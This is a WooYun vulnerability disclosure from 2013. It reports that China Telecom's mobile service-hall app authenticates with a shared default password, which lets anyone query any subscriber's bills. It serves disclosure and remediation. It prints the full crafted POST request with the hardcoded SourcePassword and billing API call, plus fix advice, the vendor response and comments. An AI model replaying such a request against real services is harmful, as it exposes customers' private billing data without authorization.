当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033560

漏洞标题:电信掌上营业厅任意手机号码话费账单查询

相关厂商:电信

漏洞作者: 不走的钟

提交时间:2013-08-05 21:37

修复时间:2013-09-19 21:38

公开时间:2013-09-19 21:38

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-05: 细节已通知厂商并且等待厂商处理中
2013-08-09: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向核心白帽子及相关领域专家公开
2013-08-29: 细节向普通白帽子公开
2013-09-08: 细节向实习白帽子公开
2013-09-19: 细节向公众公开

简要描述:

电信掌上营业厅APP存在设计错误(本例仅测试平Android平台,IOS应该也相同,但未测试),导致可以任意查询其它手机号码的套餐使用情况、话费信息、历史账单等敏感信息。

详细说明:

从数据包内容推测,厂商为了易用性,让每个手机都使用了相同的默认的密码,根据此密码来进行身份认证,但这样设计存在较高的安全风险,很多用户甚至根本不知道存在默认密码,更不会去修改密码,因此只需要构造简单数据包即可查询任何人的资费信息。
仅给一个查询手机号码为18911111111,8月使用的话费额,代码如下:

POST /map/clientXML HTTP/1.1
Content-Length: 405
Content-Type: text/xml
Host: cservice.client.189.cn:8004
Connection: Keep-Alive
User-Agent: samsung SCH-N719/3.0.3
<Request><HeaderInfos><ClientType>#3.0.3#channel0#samsung SCH-N719#</ClientType><Source>110003</Source><SourcePassword>Sid98s</SourcePassword><Token></Token><UserLoginName>18911111111</UserLoginName><Code>queryBillInfoAll</Code><Timestamp>20130501360211</Timestamp></HeaderInfos><Content><Attach>test</Attach><FieldData><Month>201308</Month><PhoneNum>18911111111</PhoneNum></FieldData></Content></Request>

漏洞证明:

漏洞证明:
189X手机号码用户,在8月使用了165.4元话费,如下图所示:

huafei.jpg

修复方案:

手机用户群体较多,此类问题解决比较麻烦,如果单独设置密码,用户体验会非常差。类似问题网上有讨论使用MAC等手机信息做为绑定,可以提高安全性的同时带来易用性,但我个人觉得不妥当,理由如下:
1、收集手机MAC或其它敏感信息,并远程存放在服务器中,会涉及用户隐私;
2、MAC和其它信息同样可以修改,也不能从根本上解决安全问题。
个人建议仅共参考,可能考虑并不全面,建议如下:
1、用户第一次登录客户端,使用短信认证,登录成功后将seesion存在数据库中,并将有效时间设为超长(例如2-3个月),当用户在会话有效期内正常登录客户端后,继续延长有效时间。如果用户在2-3个月内使用过一次客户端,那么他每次都不需要输入密码。
2、部分用户可能很少使用此功能,可能很长时间才使用一次,例如超过3个月,那么这部分用户,可以使用短信认证,或者其它密码机制;
3、注意本客户端cookie安全性,防止seesion id被轻意泄露。

版权声明:转载请注明来源 不走的钟@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-09 22:16

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报处置。
rank 10

最新状态:

暂无

漏洞评价:

评论

  1. 2013-08-05 21:50 | M0nster ( 实习白帽子 | Rank:53 漏洞数:17 | 允许我国的艺术家先富起来)

    所有地区?

  2. 2013-08-06 00:24 | 不走的钟 ( 路人 | Rank:22 漏洞数:2 | 关注网络安全!)

    和地区没好像没关系。网上随便找了几个189的号都可以查。

  3. 2013-08-08 08:53 | Ocean ( 实习白帽子 | Rank:78 漏洞数:11 | 你连世界都没有观过,哪来的世界观。)

    app应用?还是说掌厅?

  4. 2013-09-02 16:15 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    收集手机MAC?换了一个手机的话难道不让查了吗……

  5. 2013-09-02 17:07 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    如果用户在2-3个月内使用过一次客户端,那么他每次都不需要输入密码 手机丢了的话就悲剧了

  6. 2013-09-21 16:45 | sea ( 路人 | Rank:20 漏洞数:5 | 好人)

    BURP怎么截取手机端的数据呢,能详细的教一下吗?我试过用电脑做WIFI热点,手机连上,然后在手机内设置代理,代理为电脑IP,端口为BURP的设置端口,但无法捕捉到手机的数据。手机无法上网。